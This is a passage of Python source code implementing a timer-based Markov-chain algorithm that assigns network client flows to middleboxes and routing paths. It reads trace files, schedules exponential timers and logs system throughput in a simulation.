self.Timers = {} ## {(Src):[ts_begin, timer_len, pathID_old, pathID_new, DstMBox_current, DstMBox_new]}, the timer-set for each (Src)-CFlow.
##==============================================================
self.LogRun = open('Log_Alg1_running.txt','w')
#self.Log_final_result = open('Log_Alg1_final_throughput.tr','w');
self.Log_debug = open('Log_Alg1_debug_1.txt','w');
self.TS_print = 0;## Time-stamp to be shown in log-files.
##========================== !!! Critical Parameters Setting: ====================================
running_time_in_total = 120; ## 1200 seconds, this time can be changed.
step_to_check_timer_expiration = 0.01;## unit of time is second.
stepCount_to_print_throughput = 100;## unit: 10 steps of one-timer_checking.
self.Style_of_throughput_by_simulation_or_Mininet = 1 ## 1 indicates simulation; 0 represents mininet.
thread.start_new_thread(self.Keep_running_alg1, (running_time_in_total,
step_to_check_timer_expiration, stepCount_to_print_throughput))
##========================== !!! Critical Parameters Setting:##End of __init__():~
###############################################################
def get_pathSelected(self):
return self.PathSet_selected;
def get_pathSet(self):
return self.Paths_set;
def get_timeStamp(self):
ts_cur = self.TS_print;
return ts_cur;
#########################################################################################################################################
def Keep_running_alg1(self, Total_running_time, Step_to_check_timer, StepCount_to_print_throughput ):
self.T = Total_running_time; ## Alg-parameter: Set The total running period of alg1 as 1200 seconds. (This time can be changed.)
self.STEP_TO_CHECK_TIMER = Step_to_check_timer; ## Alg-parameter: The step (length of interval) of check timer-expiration.
self.Ds = 1; ## Alg-parameter: Must be larger than 1 and smaller than |Js|.
self.Beta = 5; ## Alg-parameter: The parameter in the theoretical derivation.
self.Tau = 0; ## Alg-parameter: The alpha regarding the Markov_Chain.
self.Log = open('Log_Alg1_Cost_STEP'+str(self.STEP_TO_CHECK_TIMER)+'.tr','w');
# ===================================== Begin to run =========================================
## --- A. Read trace.
self.FuncReadTrace(self.PathData_file, self.Traffic_file, self.Cap_links_file, self.Cap_MBoxes_file);
## --- B.1 Stage 0: Initialization.
self.Initialization();
_timeStamp_Begin_to_run = time.time(); ## Return the current-timeStamp, unit-time is second.
self.LogRun.write( '_timeStamp_Begin_to_run: %f \n'%(_timeStamp_Begin_to_run) )
self.LogRun.flush()
### --- B.2 Stage 1: Initialize self.Timers for all pairs.
self.Set_timer_for_all_CFlows( _timeStamp_Begin_to_run );
## --- C. Enter into time-slot Count-Down process.
current_ts = _timeStamp_Begin_to_run; ### Initialize the current_ts.
step_times = 0;
last_ts_to_check_timer = _timeStamp_Begin_to_run;
Cumulative_Notification_times = 0;
Cumulative_TimerCountDown_times = 0;
self.Call_and_record_system_performance(current_ts,step_times,
Cumulative_Notification_times,
Cumulative_TimerCountDown_times);
_timeStamp_alg_should_terminate = _timeStamp_Begin_to_run + self.T;
while ( current_ts <= _timeStamp_alg_should_terminate ):
RESET_Msg = 0;
##### -- C.1 listen to the event of any timer's expiration.
Length_to_check_timers_experiation = self.STEP_TO_CHECK_TIMER;
if ((current_ts - last_ts_to_check_timer) >= Length_to_check_timers_experiation ):
### --- C.1.0 Update the timer-checking time-slot.
last_ts_to_check_timer = current_ts;
### --- C.1.1 Check self.Timers, if any timer is out, swap its relavant SrcCFlow's hostMBox and path.
ret_timer_check_result = self.Check_expiration_of_timers(current_ts);
if len(ret_timer_check_result)>0:
RESET_Msg = 1;
for key,val in ret_timer_check_result.items():
### ---- C.1.1.1 Read the MBox-CFlow holding information.
Src_CFlow = key;
pathID_old = val[0];## Get the returned pathID_old.
pathID_new = val[1];## Get the returned pathID_new.
Dst_MBox_cur = val[2];## Get the returned Dst_MBox_cur.
Dst_MBox_new = val[3];## Get the returned Dst_MBox_new.
### ---- And replace the old routing-path with the new selected routing-path for a Src_ClientFlow.
self.Replace_the_selected_DstMBox_and_Path_for_a_SrcCFlow( Src_CFlow, Dst_MBox_cur, Dst_MBox_new,
pathID_old, pathID_new );
## --- C.1.1.2 !!!! Clear-the-timeouted-timer-items.
self.Delete_expired_timer_items_after_replacement(Src_CFlow);
### --- C.1.1.3 !!! Record the timer's time-out times.
Cumulative_TimerCountDown_times += 1;
##### -- C.2 listen to the event of any Controller's RESET Msg.
if 1==RESET_Msg:
#self.LogRun.write( '\n ================= RESET all self.Timers at ts [ %s ] :\n'%(current_ts) )
#self.LogRun.flush()
self.RESET(current_ts);
#self.LogRun.write( '\n ================= End of RESET all self.Timers at ts [ %s ] :~\n'%(current_ts) )
#self.LogRun.flush()
## !!! Record the times of RESET-Event(In each RESET-Event, a notification-event need to do).
Cumulative_Notification_times += 1;
##### -- C.4 time flies, increase time-slot
###current_ts += self.STEP_TO_RUN;## Simulation-style.
time.sleep( self.STEP_TO_CHECK_TIMER );
current_ts = time.time();### Update the current_ts with now-time. This is the real-time-experiment style.
step_times +=1;
##### -- C.5 record performance of system periodically.
if ( 0 == step_times%StepCount_to_print_throughput ):
Throughput = self.Get_objVal_of_configurations_in_whole_system();
self.TS_print = current_ts - _timeStamp_Begin_to_run;
self.LogRun.write('-TimeStamp\t%f\t-Throughput\t%s\n'%(self.TS_print, Throughput));
self.LogRun.flush()
if ( 0 == step_times%StepCount_to_print_throughput ):
self.Call_and_record_system_performance(self.TS_print,step_times,Cumulative_Notification_times,Cumulative_TimerCountDown_times);
## ====== while :~
self.Write_down_the_current_solution_MBox_Path_assignment(self.TS_print);
self.Record_final_result(self.TS_print,step_times,Cumulative_Notification_times,Cumulative_TimerCountDown_times);
self.Log.close();
self.LogRun.close();
#self.Log_final_result.close();
self.Log_debug.close();
## ==== Finally, terminate this thread.
thread.exit_thread()### End of this function :~
#########################################################################################################################################
# ==========================================================================================
def FuncReadTrace(self,CandPaths_file,TrafficDemand_file,CapLinks_file,CapMBoxes_file):
# ---- 1 Read the Given path data :
#global self.PathSet_cand;
Global_path_id_idx = 0; ### The path_id is labelled from 0.
with open(CandPaths_file,'r') as f:
for lines in f:
line=lines.strip('\n')
lineContent = line.split('\t')
Dst_id = str(lineContent[1]);
Src_id = str(lineContent[3]);
path = str(lineContent[7]);
One_path = [];
pathContent = path.split(">")
for i in range(len(pathContent)-1,-1,-1):## Reverse the content of this path.
One_path.append(str(pathContent[i]));
#############################
path_id = Global_path_id_idx;
Global_path_id_idx += 1;
## -- 1.1 record this path into the self.Paths_set.
if path_id not in self.Paths_set.keys():
self.Paths_set[path_id] = One_path;
## -- 1.2 record this path into the self.PathSet_cand.
if (Src_id,Dst_id) not in self.PathSet_cand.keys():
self.PathSet_cand[(Src_id,Dst_id)] = [];
self.PathSet_cand[(Src_id,Dst_id)].append(path_id);
else:
self.PathSet_cand[(Src_id,Dst_id)].append(path_id);
### ---- 1 Read the Given path data :~
# ---- 2 Read the Given self.TDSet data :
#global self.TDSet, self.list_CFlowSrc_id;
with open(TrafficDemand_file,'r') as f:
for lines in f:
line=lines.strip('\n')
lineContent = line.split("\t")
Src_id = str(lineContent[3]);
Rate = str(lineContent[5]);
## --- record TD.
if Src_id not in self.TDSet.keys():
self.TDSet[Src_id] = float(Rate);
if Src_id not in self.list_CFlowSrc_id:
self.list_CFlowSrc_id.append(Src_id);
### ---- 2 Read the Given self.TDSet data :~
# ---- 3 Read the Capacity of links and all nodes and all edges:
#global self.Cap_links, self.Nodes_set, self.Edges_set;
Global_edge_Idx = 0; ## From 0 to label the id of an edge.
with open(CapLinks_file,'r') as f:
for lines in f:
line=lines.strip('\n')
lineContent = line.split("\t")
u_id = str(lineContent[1]);
v_id = str(lineContent[3]);
CapVal = float(lineContent[5]);
if (u_id,v_id) not in self.Cap_links.keys():
self.Cap_links[(u_id,v_id)] = CapVal;
if (v_id,u_id) not in self.Cap_links.keys():
self.Cap_links[(v_id,u_id)] = CapVal;
## --- record the nodes from topology.
if u_id not in self.Nodes_set:
self.Nodes_set.append(u_id);
if v_id not in self.Nodes_set:
self.Nodes_set.append(v_id);
## --- record the edges from topology.
edge_id = Global_edge_Idx;
Global_edge_Idx += 1;
if edge_id not in self.Edges_set.keys():
self.Edges_set[edge_id] = (u_id,v_id);
else:
self.Edges_set[edge_id] = (u_id,v_id)### ---- 3 Read the Capacity of links:~
# ---- 4 Read the Capacity of Middle-Boxes:
#global self.Cap_MBoxes;
with open(CapMBoxes_file,'r') as f:
for lines in f:
line=lines.strip('\n')
lineContent = line.split("\t")
MBox_id = str(lineContent[1]);
CapVal = float(lineContent[3]);
## --- 4.1 record Middlebox-Connected-Switches and Client-Flow-Src-switches.
if MBox_id not in self.list_MBoxDst_id:
self.list_MBoxDst_id.append(MBox_id);
## --- 4.2 record the capacity of MBoxes.
if MBox_id not in self.Cap_MBoxes.keys():
self.Cap_MBoxes[MBox_id] = CapVal# ---- 4 Read the Capacity of Middle-Boxes :~ ## --- End of this function :~
# ==========================================================================================
def Initialization(self):
### ===== 1. Select target assigned MBox for each CFlow i.
#self.Log_debug.write( "======= In Initialization, self.TDSet "+str(self.TDSet)+"\n" )
#self.Log_debug.flush()
#self.f1.write("91 \n")
for id_CF in self.TDSet.keys():
## ===== 1.1 Rdmly select a target MBox j, then predict whether it is feasible.
CNT_Mbox = len(self.list_MBoxDst_id);
idx_MboxID_rdmlySelected = random.randint(0,CNT_Mbox-1);
MboxID_rdmlySelected = self.list_MBoxDst_id[idx_MboxID_rdmlySelected];
## ===== 1.2 Check whether it is feasible to hold CFlow i.
#self.f1.write("92 \n")
bool_whether_tarMBox_feasible = self.Check_whether_tarMBox_feasible_to_a_CFlow(id_CF, MboxID_rdmlySelected);
#self.Log_debug.write( "\t bool_whether_tarMBox_feasible "+str(bool_whether_tarMBox_feasible)+"\n" )
#self.Log_debug.flush()
#self.f1.write("93 \n")
if (1==bool_whether_tarMBox_feasible):
### ---- 1.2.1 Update the MBox-CFlow holding information.
self.MBox_trys_to_host_a_CFlow( MboxID_rdmlySelected, id_CF );
#self.f1.write("94\n")
### ===== 1.2.2 Randomly Select a path for CFlow i and its designated MBox j.
#self.Log_debug.write( "\t self.PathSet_cand " +str(self.PathSet_cand)+" ============ End of checking Pathset_cand.\n" )
#self.Log_debug.flush()
for key,val in self.PathSet_cand.items():
Src = key[0];
Dst = key[1];
#self.f1.write("95 \n")
if (Src==id_CF and Dst==MboxID_rdmlySelected):
CNT_paths_cand = len(val);
## -- 1.2.2.1. randomly select unique Ds(==1) paths for each pair (Src,Dst).
list_path_idxs = random.sample(xrange(0, CNT_paths_cand), self.Ds);
list_pathIDs_selected = [];
#self.f1.write("96\n")
for idx in list_path_idxs:
idx_found = self.PathSet_cand[key][idx]
#self.Log_debug.write("\t----idx_found "+str(idx_found)+"\n" )
#self.Log_debug.write("\t----list_path_idxs"+str(list_path_idxs)+"\n" )
list_pathIDs_selected.append( idx_found );
#self.f1.write("97 \n")
## -- 1.2.2.2. initialize the self.PathSet_selected by the selected Ds paths.
Path_ID_newly_adopted = -1;
#self.Log_debug.write("\t----list_path_idxs"+str(list_path_idxs)+"\n" )
#self.Log_debug.write("list_pathIDs_selected"+" "+str(list_pathIDs_selected)+"\n")
for path_id in list_pathIDs_selected:
#self.f1.write("98 \n")
#self.Log_debug.write( Src+" -------> "+Dst+"\n")
if (Src,Dst) not in self.PathSet_selected.keys():
self.PathSet_selected[(Src,Dst)] = [];
#self.Log_debug.write("Path_ID_newly_adopted "+str(Path_ID_newly_adopted)+"\n" )
#self.Log_debug.write("path_id "+str(path_id)+"\n")
Path_ID_newly_adopted = path_id;
### ---- !!! Before adopting this new path, judge whether it is feasible to this (s,d).
#### ----!! Before using the new-path, check whether it is still feasible to this Src_CFlow.
#self.Log_debug.write("Path_ID_newly_adopted " + str(Path_ID_newly_adopted)+"\n")
#self.f1.write("99 \n")
bool_whether_this_new_path_is_feasible = self.Check_whether_this_new_path_is_feasible_to_the_SrcCFlow(Src,Dst,Path_ID_newly_adopted);
#self.f1.write("100 \n")
#self.Log_debug.write( "\t====!!! bool_whether_this_new_path_is_feasible"+" "+str(bool_whether_this_new_path_is_feasible)+"\n" )
#print self.PathSet_selected[(Src,Dst)]
#print "\n"
#print "Path_ID_newly_adopted not in self.PathSet_selected[(Src,Dst)]:"
#print Path_ID_newly_adopted not in self.PathSet_selected[(Src,Dst)]
#print "\n"
if (1==bool_whether_this_new_path_is_feasible) and (Path_ID_newly_adopted not in self.PathSet_selected[(Src,Dst)]):
self.PathSet_selected[(Src,Dst)].append(Path_ID_newly_adopted)## --- End of this function :~
#self.LogRun.write("\t------- In the END of Initialization: PathSet_selected "+ str(self.PathSet_selected)+"\n")
#self.LogRun.flush()
# ================================================
def MBox_trys_to_host_a_CFlow(self, Mbox_ID, CFlow_ID ):
#global self.Cap_MBoxes;
### ---- 0.0 Check Mbox_ID is regular.
if -1==Mbox_ID:
return
### ---- 0.1 Check feasible of MBox.
second_check_feasible = self.Check_whether_tarMBox_feasible_to_a_CFlow(CFlow_ID, Mbox_ID);
if (0==second_check_feasible):
return
### ---- 1. Check Mbox_ID is regular.
if Mbox_ID >= 0:
if Mbox_ID not in self.MBoxSet_assigned.keys():
self.MBoxSet_assigned[Mbox_ID] = [];
### ---- 1.1 Bind the host-MBox and CFlow.
if CFlow_ID not in self.MBoxSet_assigned[Mbox_ID]:
self.MBoxSet_assigned[Mbox_ID].append( CFlow_ID );
pass##self.LogRun.write( '\t\t-- Bind -- CFlow_ID[ %d ] <--> Mbox_ID[ %d ] \n'%(CFlow_ID, Mbox_ID) )
pass##self.LogRun.write( '\t\t -- after Bind -- self.MBoxSet_assigned[ %d ]: %s \n'%(Mbox_ID, self.MBoxSet_assigned[Mbox_ID]) )
### ---- 1.1.1 Update the resouces information of host-MBox.
current_Cap_MBox = self.Cap_MBoxes[Mbox_ID];
consumed_Cap_by_CFlow = float(self.TDSet[CFlow_ID]);
self.Cap_MBoxes[Mbox_ID] = current_Cap_MBox - consumed_Cap_by_CFlow;
if self.Cap_MBoxes[Mbox_ID] < 0:
pass##self.LogRun.write( '\t\t==== WARN ==== self.Cap_MBoxes[ %d ] : %f\n'%(Mbox_ID, self.Cap_MBoxes[Mbox_ID]) )## --- End of this function :~
# ================================================
def MBox_removes_a_CFlow( self,Mbox_ID, CFlow_ID ):
#global self.Cap_MBoxes;
if Mbox_ID in self.MBoxSet_assigned.keys():
### ---- 1. Dis-Bind the host-MBox and CFlow.
if CFlow_ID in self.MBoxSet_assigned[Mbox_ID]:
self.MBoxSet_assigned[Mbox_ID].remove( CFlow_ID );
pass##self.LogRun.write( '\t\t~~ UnBind ~~ CFlow_ID[ %d ] --X-- Mbox_ID[ %d ] \n'%(CFlow_ID, Mbox_ID) )
pass##self.LogRun.write( '\t\t ~~ after UnBind ~~ self.MBoxSet_assigned[ %d ]: %s \n'%(Mbox_ID, self.MBoxSet_assigned[Mbox_ID]) )
### ---- 2. Update the resouces information of host-MBox.
current_Cap_MBox = self.Cap_MBoxes[Mbox_ID];
consumed_Cap_by_CFlow = float(self.TDSet[CFlow_ID]);
self.Cap_MBoxes[Mbox_ID] = current_Cap_MBox + consumed_Cap_by_CFlow## --- End of this function :~
# ================================================
def Check_whether_tarMBox_feasible_to_a_CFlow(self,id_CFlow, id_tarMBox):
#global self.Cap_MBoxes;
ret_Status_feasible = 0## initialized to 0(false)
TD_CFlow = float(self.TDSet[id_CFlow]);
availabl_Cap_tarMBox = self.Cap_MBoxes[id_tarMBox];
if (availabl_Cap_tarMBox > 0) and (availabl_Cap_tarMBox - TD_CFlow >= 0):
ret_Status_feasible = 1##(1 represents true)
return int(ret_Status_feasible)## --- End of this function :~
# ================================================
def Select_a_rdm_feasible_NIU_MBox_for_the_targetCFlow(self,Src_CFlow_ID):
ret_MBoxID_NIU = -1; ## If cannot find one, return a -1, which will incur a definite error.
## -- 1. get the list_NIU_MBoxes corresponding to this Src_CFlow.
list_MBoxes_NIU = self.Get_list_of_NIU_MBoxes_corresponding_to_the_Src(Src_CFlow_ID);
## -- 2. rdmly pick up one from the list, until it is a feasible one.
list_MBoxes_NIU_checked = [];
while ( len(list_MBoxes_NIU_checked) < len(list_MBoxes_NIU) ):
CNT_MBoxes_NIU = len(list_MBoxes_NIU);
if CNT_MBoxes_NIU == 0:
return -1### Not found even one MB_NIU.
if CNT_MBoxes_NIU >= 1:
idx_targetMBox = random.randint(0,CNT_MBoxes_NIU-1);
rdm_MBoxID_NIU = list_MBoxes_NIU[idx_targetMBox];
if ( rdm_MBoxID_NIU not in list_MBoxes_NIU_checked ):
bool_whether_tarMBox_feasible = self.Check_whether_tarMBox_feasible_to_a_CFlow(Src_CFlow_ID, rdm_MBoxID_NIU);
if (1==bool_whether_tarMBox_feasible):
ret_MBoxID_NIU = rdm_MBoxID_NIU
return ret_MBoxID_NIU### Return it directly.
else:### Not feasible
list_MBoxes_NIU_checked.append(rdm_MBoxID_NIU)### End of while :~
# if (-1==ret_MBoxID_NIU):
# print list_MBoxes_NIU_checked
# print list_MBoxes_NIU
return ret_MBoxID_NIU## --- End of this function :~
# ================================================
def Select_a_rdm_NIU_MBox_for_the_targetCFlow(self,Src_CFlow_ID):
ret_MBoxID_NIU = -1; ## If cannot find one, return a -1, which will incur a definite error.
## -- 1. get the list_NIU_MBoxes corresponding to this Src_CFlow.
list_MBoxes_NIU = self.Get_list_of_NIU_MBoxes_corresponding_to_the_Src(Src_CFlow_ID);
## -- 2. pick up one rdmly from the list.
CNT_MBoxes_NIU = len(list_MBoxes_NIU);
if CNT_MBoxes_NIU >= 1:
idx_targetMBox = random.randint(0,CNT_MBoxes_NIU-1);
ret_MBoxID_NIU = list_MBoxes_NIU[idx_targetMBox];
return ret_MBoxID_NIU## --- End of this function :~
# ================================================
def Get_list_of_NIU_MBoxes_corresponding_to_the_Src(self,Src_CFlow_ID):
## -- 1. get the holding MBox_ID corresponding to this Src_CFlow.
Host_MBoxID_of_the_Src = self.find_holding_MBox_of_a_SrcCFlow(Src_CFlow_ID);
## -- 2. filter all the MBoxes.
list_MBox_not_in_use = [MBox for MBox in self.list_MBoxDst_id if MBox != Host_MBoxID_of_the_Src ];
return list_MBox_not_in_use## --- End of this function :~
# ================================================
def find_holding_MBox_of_a_SrcCFlow(self,Src_CFlow_ID):
ret_holding_MB_id = -1;
for key,val in self.MBoxSet_assigned.items():
list_binded_SrcCF_IDs = val;
if Src_CFlow_ID in list_binded_SrcCF_IDs:
ret_holding_MB_id = key
return ret_holding_MB_id## -- End of this function :~
# ================================================
def find_currently_selected_pathID_of_a_SrcCFlow(self,Src_CFlow_ID):
ret_cur_selected_pathID_id = -1;
#global self.PathSet_selected
for key,val in self.PathSet_selected.items():
if Src_CFlow_ID==key[0]:
list_assigned_path_IDs = val;
if len(list_assigned_path_IDs)>0:
ret_cur_selected_pathID_id = list_assigned_path_IDs[0];#### !!!! HERE: just take the first path.
return ret_cur_selected_pathID_id## -- End of this function :~
# ================================================
def Get_the_current_selected_MBoxID_and_PathID_of_SrcCFlow(self,Src):
retMBoxID = self.find_holding_MBox_of_a_SrcCFlow(Src);
retPathID = self.find_currently_selected_pathID_of_a_SrcCFlow(Src);
return retMBoxID,retPathID## -- End of this function :~
# ================================================
# ================================================
def Get_max_value_of_a_dict(self, dict ):
dictTemp={v:k for k,v in dict.items()}
return dict[ dictTemp[max(dictTemp)] ]
# ================================================
def Get_min_value_of_a_dict(self, dict ):
dictTemp={v:k for k,v in dict.items()}
return dict[ dictTemp[min(dictTemp)] ]
# ================================================
# ==========================================================================================
def get_size_of_Js(self, Src, Dst ):## { Get the Number_of_candidate_paths_for_this_pair(Src,Dst)}, the info of self.PathSet_cand.
retNum_Paths_of_this_session = 0;
for key,val in self.PathSet_cand.items():
Src0 = key[0];
Dst0 = key[1];
if Src0==Src and Dst0==Dst:
retNum_Paths_of_this_session = len(val);
return retNum_Paths_of_this_session## --- End of this function :~
# ==========================================================================================
def get_size_of_Ds(self, Src, Dst ):## { Get the Number_of_In-Use_paths_for_this_pair(Src,Dst)}, the info of self.PathSet_selected.
retNum_Paths_of_this_session = 0;
#global self.PathSet_selected
for key,val in self.PathSet_selected.items():
Src0 = key[0];
Dst0 = key[1];
if Src0==Src and Dst0==Dst:
retNum_Paths_of_this_session = len(val);
return retNum_Paths_of_this_session## --- End of this function :~
# ==========================================================================================
def Check_expiration_of_timers(self, Current_ts ):## Returned value: 1: timer expires; 0: not.
#global self.Timers;
ret_timer_result = {} ## {(SrcCFlow):[pathID_old, pathID_new, Dst_MBox_old, Dst_MBox_new]}
# check each timer
for Src,val in self.Timers.items():
Ts_begin = val[0];
Len_timer = val[1];
pathID_old = val[2];
pathID_new = val[3];
Dst_MBox_old = val[4];
Dst_MBox_new = val[5];
if ( Current_ts >= Ts_begin+Len_timer ):
if Src not in ret_timer_result.keys():
pass##self.LogRun.write( '\n======&&====== TimerOut: Src[ %d ] Ts_begin[ %s ] Len_timer[ %s ] DstMBox_old[ %s ] DstMBox_new[ %s ].'%(Src, Ts_begin, Len_timer, Dst_MBox_old, Dst_MBox_new) )
ret_timer_result[Src]=[-1,-1,-1,-1];
ret_timer_result[Src][0] = pathID_old;
ret_timer_result[Src][1] = pathID_new;
ret_timer_result[Src][2] = Dst_MBox_old;
ret_timer_result[Src][3] = Dst_MBox_new;
return ret_timer_result## --- End of this function :~
# ==========================================================================================
def Get_a_rdm_pathID_NIU_from_CandidatePathSet(self,Src, Dst): ## NIU: Not-In-Use.
ret_pathID_NIU = 0;
list_paths_NIU = self.Get_list_of_pathIDs_not_in_use(Src, Dst);
CNT_paths_NIU = len(list_paths_NIU);
if CNT_paths_NIU >= 1:
idx_targetNewPath = random.randint(0,CNT_paths_NIU-1);
ret_pathID_NIU = list_paths_NIU[idx_targetNewPath];
return ret_pathID_NIU## --- End of this function :~
def Get_list_of_pathIDs_not_in_use(self,Src, Dst): ## pair of (Src, Dst).
#global self.PathSet_cand, self.PathSet_selected;
list_paths_not_in_use = [];
listPaths_cand = self.PathSet_cand[(Src,Dst)];
list_paths_in_use = [];
if (Src,Dst) in self.PathSet_selected.keys():#### !!!! Check whether this s-d exists in the Path_assigned.
list_paths_in_use = self.PathSet_selected[(Src,Dst)];
for path_cand in listPaths_cand:
if path_cand not in list_paths_in_use:
list_paths_not_in_use.append( path_cand );
return list_paths_not_in_use## --- End of this function :~
def Get_a_rdm_pathID_IU_from_SeletedPathSet(self,Src, Dst): ## IU: In-Use.
#global self.PathSet_selected;
ret_pathID_IU = 0;
CNT_paths_of_this_pair = len(self.PathSet_selected[(Src,Dst)]);
if CNT_paths_of_this_pair >= 1:
idx_Path_IU = random.randint(0,CNT_paths_of_this_pair-1);
ret_pathID_IU = self.PathSet_selected[(Src,Dst)][idx_Path_IU];
return ret_pathID_IU## --- End of this function :~
def Get_num_of_IU_paths_of_a_session(self,Src, Dst): ## IU: In-Use.
#global self.PathSet_selected;
ret_num_IU = 0;
ret_num_IU = len(self.PathSet_selected[(Src,Dst)]);
return ret_num_IU## --- End of this function :~
# ==========================================================================================
def Get_objVal_of_configurations_in_whole_system(self):
#global self.PathSet_selected;
ret_system_throughput = 0
dict_all_satisfied_CF = {}
for SrcCF,DstMB in self.PathSet_selected.keys():
if (len(self.PathSet_selected[(SrcCF,DstMB)])==1) and (SrcCF not in dict_all_satisfied_CF.keys()):
dict_all_satisfied_CF[SrcCF] = 1##(1 is not important)
for key in dict_all_satisfied_CF.keys():
ret_system_throughput += self.TDSet[key]
return ret_system_throughput## --- End of this function :~
# ==========================================================================================
def Get_largest_utility_of_both_links_and_nodes(self):
#global self.PathSet_selected;
#### ------ 0. Define necessary dicts.
dict_LinkLoad = {}; ## {(u,v):loadVal}, a dict which records the sum-traffic-load in each arc.
for (u,v) in self.Cap_links.keys():
if (u,v) not in dict_LinkLoad.keys():
dict_LinkLoad[(u,v)] = 0.0;### -- !!! Initialization, otherwise, the total-link-cost will be smaller.
dict_NodeLoad = {}; ## {(u):loadVal}, a dict which records the sum-num-rules-load in each node.
for u in self.Nodes_set:
if u not in dict_NodeLoad.keys():
dict_NodeLoad[u] = 0;### -- !!! Initialization is necessary.
## -- 1. Analyse each selected-path in val, get and record all arc-links and nodes in this path.
for key,val in self.PathSet_selected.items():
for idx_pathID in range(0, len(val)):
path_id = val[idx_pathID];
listPath_i = self.Paths_set[path_id];
for node_idx in range(len(listPath_i)):
if (node_idx+1) < len(listPath_i):
u = listPath_i[node_idx];
v = listPath_i[node_idx+1];
## -- 1.1 record links travelled.
if (u,v) not in dict_LinkLoad.keys():
dict_LinkLoad[(u,v)] = self.TDSet[key[0]];
else:
dict_LinkLoad[(u,v)] += self.TDSet[key[0]];
## -- 1.2 record all the nodes in the links travelled.
if u not in dict_NodeLoad.keys():
dict_NodeLoad[u] = 0;
else:
dict_NodeLoad[u] += 1;
if v not in dict_NodeLoad.keys():
dict_NodeLoad[v] = 0;
else:
dict_NodeLoad[v] += 1;
## -- 2. Calculate the ObjVal based on LinkLoad.
Ret_largest_linkCost = self.Get_max_value_of_a_dict(dict_LinkLoad);
## -- 3. Find the node which owns the largest holding rules based on dict_NodeLoad.
Ret_largest_ruleCost = self.Get_max_value_of_a_dict(dict_NodeLoad);
### -- 3. Return them.
return Ret_largest_linkCost,Ret_largest_ruleCost### --- End of this function :~
# ==========================================================================================
# ==========================================================================================
def Set_timer_for_one_CFlow(self,Src, Current_ts):
pass##self.LogRun.write( '\n ####### Try to set timer for Src-CFlow[ %d ], at ts [ %s ]:'%(Src, Current_ts) )
### ===== A. rdmly select a NIU MBox for this traget-ClientFlow.
feasible_DstMBox_rdm = self.Select_a_rdm_feasible_NIU_MBox_for_the_targetCFlow(Src);
if (-1==feasible_DstMBox_rdm):
return#### If -1 is returned: cannot find a feasible MBox for this Src, so, do nothing for it.
### ===== B. if the feasible Dst_MBox-sw is found, pick one path for this pair(Src, Dst).
pass##self.LogRun.write( '\n\t---- Src-CFlow[ %d ] finds out a feasible DstMBox[ %d ]\n'%(Src,feasible_DstMBox_rdm) )
### ===== (Rdmly/Greedly) Find a routing path for this SD-pair.
Dst_new = feasible_DstMBox_rdm;
# -- 1. Get the_current_selected_MBoxID_and_pathID_of_SrcCFlow, denoted as DstMBox_old and PathID_old;
DstMBox_old,PathID_old = self.Get_the_current_selected_MBoxID_and_PathID_of_SrcCFlow(Src);
# -- 2. Select one from |Js|-Ds its Not-in-Use paths, denoted as l_new;
PathID_new = self.Get_a_rdm_pathID_NIU_from_CandidatePathSet(Src, Dst_new);
# -- 3. Get the current Throughput before swapping the host-MBox and path;
Throughput = self.Get_objVal_of_configurations_in_whole_system();
# -- 4. Fake-Replace the host-MBox and Path, only for estimating the next-config-objVal.
pass##self.LogRun.write( '\n\t ####$$-- Fake_Replace, begin: Src[ %d ] - DstMBox_new[ %d ]\n'%(Src, Dst_new) )
Throughput_predicted = self.Fake_Replace_DstMBox_and_Path_for_a_SrcCFlow_to_return_estimated_sysObj(Src, DstMBox_old, Dst_new, PathID_old, PathID_new);
## -- 5. generate an exponentially distributed random timer-value with
## mean that is equal to (1/lambda_exp_random_number_seed), and record it into self.Timers.
# print 'Throughput: %f\tThroughput_predicted: %f'%(Throughput, Throughput_predicted)
exp_item = math.exp(self.Tau - 0.5*self.Beta*(Throughput_predicted-Throughput));
mean_timer_exp = 1.0*exp_item/(len(self.list_MBoxDst_id)-1);
lambda_exp_random_number_seed = 1.0/mean_timer_exp;
Timer_val_exp = random.expovariate( lambda_exp_random_number_seed );#### Generate a random exponentially-distibuted timer for the current Client-Flow.
# print 'exp_item: %f\t lambda_exp: %f\t Timer_val_exp: %f'%(exp_item, lambda_exp_random_number_seed, Timer_val_exp)
### For debuging :
# if DstMBox_old < 0:
# pass##self.LogRun.write( '\n\t\t--NOTE-- when DstMBox_old =-1:\n\t\t\tSrc-CFlow[ %d ] -Throughput[ %s ] -Throughput_predicted[ %s ] -lambda_exp_random_number_seed[ %s ] -Timer_val_exp[ %s ]\n'%(Src,Throughput,Throughput_predicted,lambda_exp_random_number_seed,Timer_val_exp) )
### For debuging :~
## -- 6. Record the necessary information into self.Timers.
DstMBox_current = DstMBox_old;
if (Src) not in self.Timers.keys(): ### --- Record 6-items information for this Src.
self.Timers[Src] = [0,0,-1,-1,-1,-1];### Initialization
self.Timers[Src][0] = Current_ts;
self.Timers[Src][1] = Timer_val_exp
self.Timers[Src][2] = PathID_old
self.Timers[Src][3] = PathID_new
self.Timers[Src][4] = DstMBox_current
self.Timers[Src][5] = Dst_new
else: ### !!!! Do not forget updating the relevant paths-info when this Src has already been exiting.
self.Timers[Src][0] = Current_ts;
self.Timers[Src][1] = Timer_val_exp
self.Timers[Src][2] = PathID_old
self.Timers[Src][3] = PathID_new
self.Timers[Src][4] = DstMBox_current
self.Timers[Src][5] = Dst_new# --- End of this function :~
# ==========================================================================================
def Set_timer_for_all_CFlows(self,Current_ts):
for Src in self.list_CFlowSrc_id:
self.Set_timer_for_one_CFlow(Src, Current_ts)# --- End of this function :~
# ==========================================================================================
def RESET(self,Current_ts):
self.Set_timer_for_all_CFlows(Current_ts)# --- End of this function :~
# ==========================================================================================
# ==========================================================================================
def Replace_the_selected_DstMBox_and_Path_for_a_SrcCFlow(self,Src, Dst_old, Dst_new, PathID_old, PathID_new):
#global self.PathSet_selected
#### !!!!! ===== 1. Swap the Dst_MBoxes for CFlow: Remove the OLD MBox, Add the NEW.
self.MBox_removes_a_CFlow( Dst_old, Src );
self.MBox_trys_to_host_a_CFlow( Dst_new, Src );
#### !!!!! ===== 2. Adopt the NEW path for Src.
#### !!!!! ===== 2.1 Remove all the OLD paths for Src.
for (SrcCF,DstMB) in self.PathSet_selected.keys():
if SrcCF == Src:
del self.PathSet_selected[(SrcCF,DstMB)]; ##此处为什么要删除
#### !!!!! ===== 2.2 Adopt the NEW path for Src.
#### -------- !! Before using the new-path, check whether it is feasible to this Src_CFlow.
#### ---- if it is not feasible: this SrcCFlow will not have a routing-path!!
